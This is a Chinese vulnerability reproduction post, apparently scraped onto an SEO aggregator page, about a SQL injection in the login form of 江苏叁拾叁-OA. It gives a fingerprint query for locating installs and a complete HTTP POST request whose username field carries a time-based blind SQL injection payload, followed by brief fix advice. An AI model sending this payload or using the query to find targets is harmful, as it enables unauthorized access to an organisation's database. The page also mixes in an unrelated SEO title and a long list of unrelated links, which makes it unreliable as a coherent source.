当前位置: 首页 > news >正文

站长平台如何推广自己的网站seo排名关键词

站长平台如何推广自己的网站,seo排名关键词,能播放优酷视频的网站怎样做,商城类app开发价格0x01 漏洞介绍 江苏叁拾叁-OA是由江苏叁拾叁信息技术有限公司开发的一款OA办公平台,主要有知识管理,工作流程,沟通交流,辅助办公,集成解决方案,应用支撑平台,基础支撑等功能。 该系统也与江苏叁…

0x01 漏洞介绍


江苏叁拾叁-OA是由江苏叁拾叁信息技术有限公司开发的一款OA办公平台,主要有知识管理,工作流程,沟通交流,辅助办公,集成解决方案,应用支撑平台,基础支撑等功能。 该系统也与江苏叁拾叁智慧农业研究院的农产品电商解决方案、社会化服务解决方案、乡村振兴解决方案等进行了深度融合。该漏洞存在于login下,username对接受的传参没有进行严格的过滤,从而导致SQL注入,攻击者可以利用该漏洞获取数据库敏感信息。


0x02 影响版本

  1. 江苏叁拾叁-OA

0x03 语法特征

  1. app="江苏叁拾叁-OA"

0x04 漏洞复现


页面
 


POC(payload sqlmap梭哈来的)

POST /login HTTP/1.1
Host:
Content-Length: 93
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: closeusername=admin' AND (SELECT 9415 FROM (SELECT(SLEEP(4)))QBMI) AND 'AUxO'='AUxO&password=admin


直接sqlmap梭哈来
 


0x05 漏洞修复建议

  1. 使用参数化查询
  2. 对用户输入进行验证和过滤
  3. 限制数据库账户权限
  4. 更新和打补丁
http://www.yayakq.cn/news/401024/

相关文章:

  • 用dedecms织梦做中英文网站网页设计网站链接怎么做
  • 广东网站备案系统百度下载安装最新版
  • 做网站 视频成都广告公司贺忠阳简历
  • 汽车网站建设报价在线制作表白网页浪漫
  • 网站建设属于硬件还是软件wordpress安装视频
  • 厦门网站建设慕枫龙华网站建设招商
  • 网站添加cnzz天下第一社区在线观看 welcome
  • joomla 2.5:你的网站建设_使用与管理 pdf南昌seo优化
  • 婚纱摄影网站定制南昌如何做百度的网站
  • 免费网站网站制作平台公司管理的三大系统
  • 网站制作属于什么行业品牌设计和平面设计的区别
  • 宽带固定ip的怎么做网站服务器通州个人做网站
  • 网站建设和维护价格树莓派wordpress穿透
  • 网站优化关键词是怎么做的新浪云搭建wordpress
  • 网站建设需求设计洞头网站建设
  • 网站建设图标网络管理系统功能
  • 天津高端网站临沂google推广
  • 南京哪家做网站好免费海报制作模板
  • 网站制作设计专业公司wordpress视频播放器
  • 义乌万物网络科技 网站建设东莞浩智网站建设多少钱
  • 长域名的优秀网站百度网站外链发布平台
  • 桂林象鼻山景点介绍大型网站建设优化企业
  • 沙田仿做网站河南省建设厅证件证件查询网站
  • 折页彩页设计深圳网站推广优化
  • 保定网站建设公司排名批量关键词排名查询工具
  • 法律推广网站重庆网站制作有名 乐云践新
  • 网站前端开发培训建设银行 公户 该网站使用过期的
  • 河南网站建设的详细策划哪里做网站
  • 达县网站制作wordpress列表页缩略图
  • 电影网站建设方案ppt模板做网站那家好